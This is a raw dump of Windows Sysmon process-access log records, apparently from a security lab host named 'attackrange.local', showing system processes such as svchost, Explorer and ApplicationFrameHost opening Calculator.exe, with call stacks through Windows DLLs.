22:12:49.468{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+2aff6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361071Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361070Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361069Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361068Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361067Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-337e-6013-9402-000000001100}75845784C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361066Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\system32\twinui.pcshell.dll+320f9|C:\Windows\system32\twinui.pcshell.dll+31966|C:\Windows\system32\twinui.pcshell.dll+14b85|C:\Windows\system32\twinui.pcshell.dll+11de6|C:\Windows\system32\twinui.pcshell.dll+1a72c|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+45f0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+41b9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+3e4f|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361065Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-337b-6013-8402-000000001100}16565180C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\TaskFlowDataEngine.dll+cded0|C:\Windows\System32\TaskFlowDataEngine.dll+971db|C:\Windows\System32\TaskFlowDataEngine.dll+96e76|C:\Windows\System32\TaskFlowDataEngine.dll+93c96|C:\Windows\System32\TaskFlowDataEngine.dll+925b8|C:\Windows\System32\TaskFlowDataEngine.dll+9cf11|C:\Windows\System32\shcore.dll+c590|C:\Windows\System32\shcore.dll+c218|C:\Windows\System32\shcore.dll+a833|C:\Windows\SYSTEM32\ntdll.dll+32f13|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361064Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1f822|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361063Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d419|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361062Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.452{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8402-000000001100}1656C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d70c|c:\windows\system32\windows.staterepository.dll+28a17|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361061Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361060Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361059Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361058Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.437{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361057Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361056Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361055Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e023|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b|C:\Windows\system32\twinui.dll+172ed 10341000x8000000000000000361054Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e227|C:\Windows\SYSTEM32\twinapi.appcore.dll+2dfdd|C:\Windows\SYSTEM32\twinapi.appcore.dll+35891|C:\Windows\SYSTEM32\twinapi.appcore.dll+2e7e0|C:\Windows\system32\twinui.pcshell.dll+173c8|C:\Windows\system32\twinui.pcshell.dll+5a8e2|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\system32\twinui.pcshell.dll+22359|C:\Windows\system32\twinui.pcshell.dll+20684|C:\Windows\system32\twinui.pcshell.dll+ff1f|C:\Windows\system32\twinui.pcshell.dll+c179b|C:\Windows\system32\twinui.pcshell.dll+d04a|C:\Windows\system32\twinui.pcshell.dll+cbfd|C:\Windows\system32\twinui.pcshell.dll+80d00|C:\Windows\system32\twinui.pcshell.dll+17896|C:\Windows\system32\twinui.pcshell.dll+1a7ae|C:\Windows\system32\twinui.dll+17c2b|C:\Windows\system32\twinui.dll+1776c|C:\Windows\system32\twinui.dll+68dfa|C:\Windows\system32\twinui.dll+17229|C:\Windows\system32\twinui.dll+1736b 10341000x8000000000000000361053Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+222a3|C:\Windows\SYSTEM32\psmserviceexthost.dll+37ea0|C:\Windows\SYSTEM32\psmserviceexthost.dll+38b65|C:\Windows\SYSTEM32\psmserviceexthost.dll+25e9b|C:\Windows\SYSTEM32\psmserviceexthost.dll+2948a|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361052Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-2a44-6013-0e00-000000001100}7124656C:\Windows\system32\svchost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\SYSTEM32\psmserviceexthost.dll+28d18|C:\Windows\SYSTEM32\psmserviceexthost.dll+26ef6|C:\Windows\SYSTEM32\ntdll.dll+3089d|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361051Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361050Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361049Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e023|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361048Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.421{8e433fbf-337e-6013-9402-000000001100}75846228C:\Windows\system32\ApplicationFrameHost.exe{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|C:\Windows\System32\twinapi.appcore.dll+2e227|C:\Windows\System32\twinapi.appcore.dll+2dfdd|C:\Windows\System32\twinapi.appcore.dll+2f4e6|C:\Windows\System32\twinapi.appcore.dll+2f3e3|C:\Windows\System32\ApplicationFrame.dll+145e0|C:\Windows\System32\ApplicationFrame.dll+14490|C:\Windows\System32\SHCORE.dll+c590|C:\Windows\System32\SHCORE.dll+c218|C:\Windows\System32\SHCORE.dll+acb1|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361047Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:49.405{8e433fbf-337b-6013-8402-000000001100}16563460C:\Windows\Explorer.EXE{8e433fbf-3438-6013-2603-000000001100}5384C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1812.10048.0_x64__8wekyb3d8bbwe\Calculator.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7e03|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+719e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7071|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+28bd|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+45fed|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+4a79d|C:\Windows\System32\USER32.dll+163ed|C:\Windows\System32\USER32.dll+15de2|C:\Windows\System32\combase.dll+a3e41|C:\Windows\System32\combase.dll+a3fc6 